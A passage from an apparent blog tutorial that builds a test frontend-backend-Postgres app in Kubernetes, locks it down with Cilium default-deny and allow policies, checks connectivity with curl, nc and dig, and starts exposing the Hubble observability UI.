<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">db</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">postgres:15-alpine</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">POSTGRES_PASSWORD</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">pass</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pg</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f test-app.yaml
</code></pre>
<p>Then run a quick shell in the <code>frontend</code> namespace and test connectivity.</p>
<pre><code class="lang-bash">kubectl run -n frontend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash

curl -sI http://api.backend.svc.cluster.local
nc -vz postgres.db.svc.cluster.local 5432
dig +short kubernetes.default.svc.cluster.local
</code></pre>
<p>You should see something similar to the following.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 14:32:10 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!
test:~# dig +short kubernetes.default.svc.cluster.local
10.96.0.1</span>
</code></pre>
<p>Everything should work: HTTP to backend, TCP to Postgres, DNS lookups. Cilium enforces nothing yet, so traffic flows freely between namespaces and pods. And our test environment is purring (I guess that is more Calico, but you get the point).</p>
<h3 id="heading-cilium-networkpolicy-primer">Cilium NetworkPolicy Primer</h3>
<p>So now let's see what Cilium's got for its <code>NetworkPolicy</code>. Cilium introduces its own CRD: <code>CiliumNetworkPolicy</code> (CNP). It extends Kubernetes <code>NetworkPolicy</code> with L7 context and identity-based enforcement — meaning it can match flows not only by port and IP, but also by <strong>service name</strong>, <strong>HTTP verb</strong>, or <strong>DNS pattern</strong>.</p>
<p>Here’s the simplest possible CNP: a namespace-scoped default-deny. Save the following as <code>cnp-default-deny.yaml</code>. It uses Cilium’s explicit deny fields (<code>ingressDeny</code> and <code>egressDeny</code>) to ensure traffic is actually blocked.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cnp-default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span>
    <span class="hljs-bullet">-</span> {} 
  <span class="hljs-attr">egressDeny:</span>
    <span class="hljs-bullet">-</span> {}
</code></pre>
<p>Apply it.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-default-deny.yaml
</code></pre>
<p>Now all the same <code>curl</code> or <code>dig</code> commands fail. No ingress, no egress, no DNS. Welcome to zero-trust networking. Insert sad face.</p>
<p>Note that unlike a standard NetworkPolicy, leaving ingress and egress empty in Cilium doesn’t automatically enforce a deny-all posture. Cilium only turns on enforcement when a rule or explicit deny exists. The version we used guarantees both directions are blocked until you start carving out allows.</p>
<p>If you’re curious what policies are active, just check the policies.</p>
<pre><code class="lang-bash">kubectl get cnp -n frontend
</code></pre>
<h3 id="heading-observing-without-hubble-more-on-that-later">Observing Without Hubble (More on that later)</h3>
<p>Right now, we’re flying blind. We have no logs, no flow data, just blocked packets. That’s fine; we’ll turn on <strong>Hubble</strong> soon for x-ray-vision-level (see the cool kid) insight into what’s happening under the hood. For now, the takeaway is simple: Cilium enforces deny/allow semantics just like Calico or native <code>NetworkPolicy</code>.</p>
<p>But, Cilium can express policies with far more context than ports. For example, an egress rule that allows DNS lookups through CoreDNS, matching on protocol and even query patterns. We’ll come back to this when we enable Hubble.</p>
<hr />
<h2 id="heading-rebuilding-the-three-tier-flows-under-cilium">Rebuilding the Three-Tier Flows Under Cilium</h2>
<p>Now that Cilium is enforcing properly, we can mirror the same three-hop app flows we created earlier: <strong>frontend → backend → database</strong>, plus DNS egress. This will give us a clean baseline before enabling Hubble and exploring L7.</p>
<h3 id="heading-1-deny-all-in-each-namespace">1. Deny-All in Each Namespace</h3>
<p>Save the following as <code>cnp-deny-all.yaml</code>. This will shut down all traffic in and out for each of our three namespaces, not just <code>frontend</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-deny-all.yaml
</code></pre>
<h3 id="heading-2-allow-dns-egress-globally">2. Allow DNS Egress Globally</h3>
<p>Save the following as <code>ccnp-allow-dns.yaml</code>. This will allow CoreDNS to access the outside world. Notice this is a <code>CiliumClusterwideNetworkPolicy</code>. Nothing special, just not namespaced and gives <code>NodeSelector</code> capabilities.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumClusterwideNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-coredns-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
      <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEntities:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">kube-apiserver</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"443"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEntities:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">world</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-dns-egress.yaml
</code></pre>
<h3 id="heading-3-allow-dns-egress-per-namespace">3. Allow DNS Egress per Namespace</h3>
<p>We'll need to also allow each namespace DNS egress. Save the following as <code>cnp-ns-dns.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply as usual.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-ns-dns.yaml
</code></pre>
<h3 id="heading-4-app-flows-frontend-backend-db">4. App Flows: Frontend → Backend → DB</h3>
<p>Save the following as <code>cnp-front-to-back.yaml</code>. This will allow our frontend to reach the backend.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">front-egress-to-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-ingress-from-front</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>Save the following as <code>cnp-back-to-db.yaml</code>. This will allow our backend to reach the database.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-egress-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">db</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">postgres</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"5432"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db-ingress-from-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"5432"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply to wrap up all the policies</p>
<pre><code class="lang-bash">kubectl apply -f cnp-front-to-back.yaml
kubectl apply -f cnp-back-to-db.yaml
</code></pre>
<h3 id="heading-5-quick-tests">5. Quick Tests</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Frontend → Backend (HTTP)</span>
matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
app:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 21:49:48 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

# Backend → DB (Postgres)
matt@ciliumcontrolplane:~/blog$ kubectl -n backend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don'</span>t see a <span class="hljs-built_in">command</span> prompt, try pressing enter.
app:~<span class="hljs-comment"># nc -vz postgres.db.svc.cluster.local 5432</span>
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!
</code></pre>
<p>I think I did all of the right, but let me know if something is off. This is all pretty similar to what we've done before, but we've got to cover the bases. With traffic restored for the intended paths our app is looking nice and tidy. Onward and upward.</p>
<hr />
<h2 id="heading-lighting-up-hubble">Lighting Up Hubble</h2>
<p>We’ve got our service boundaries locked down. Now it’s time to actually <em>see</em> them in action.  That’s where <strong>Hubble</strong> comes in: Cilium’s built-in observability layer that turns packet-level noise into readable flow context. And it just works. </p>
<p>Hubble runs as a <strong>Relay</strong> (for aggregation) and an optional <strong>UI</strong> (for pretty visuals).<br />We’ll use both.</p>
<h3 id="heading-step-1-enable-hubble">Step 1: Enable Hubble</h3>
<p>If you didn’t enable it during install, it’s just one command.</p>
<pre><code class="lang-bash">cilium hubble <span class="hljs-built_in">enable</span> --ui
</code></pre>
<p>And you should see the following. </p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~/blog$ kubectl get po -n kube-system | grep hubble
hubble-relay-cdd887546-nxcs2                 1/1     Running   0          16h
hubble-ui-69d69b64cf-s6rj7                   2/2     Running   0          16h
</code></pre>
<p>This deploys:</p>
<ul>
<li><p><code>hubble-relay</code> – the data service that aggregates flow logs from each Cilium agent</p>
</li>
<li><p><code>hubble-ui</code> – a lightweight web frontend</p>
</li>
</ul>
<h3 id="heading-step-2-access-the-hubble-ui">Step 2: Access the Hubble UI</h3>
<p>Expose it locally (for your Mac in this case) with a <code>NodePort</code>. This makes it accessible directly from your control plane node’s IP. Start by patching the service.</p>
<p>Oh but wait, that doesn't work because of the Operator pattern. This has happened with many tools so let's just create our own service that leaves the others undisturbed. So here is the <code>hubble-service.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hubble-ui-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">hubble-ui</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8081</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">nodePort:</span> <span class="hljs-number">31080</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hubble-relay-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">hubble-relay</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">relay</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">8090</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8090</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">nodePort:</span> <span class="hljs-number">31083</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f hubble-service.yaml
</code></pre>
<p>Then access the Hubble dashboard at:</p>
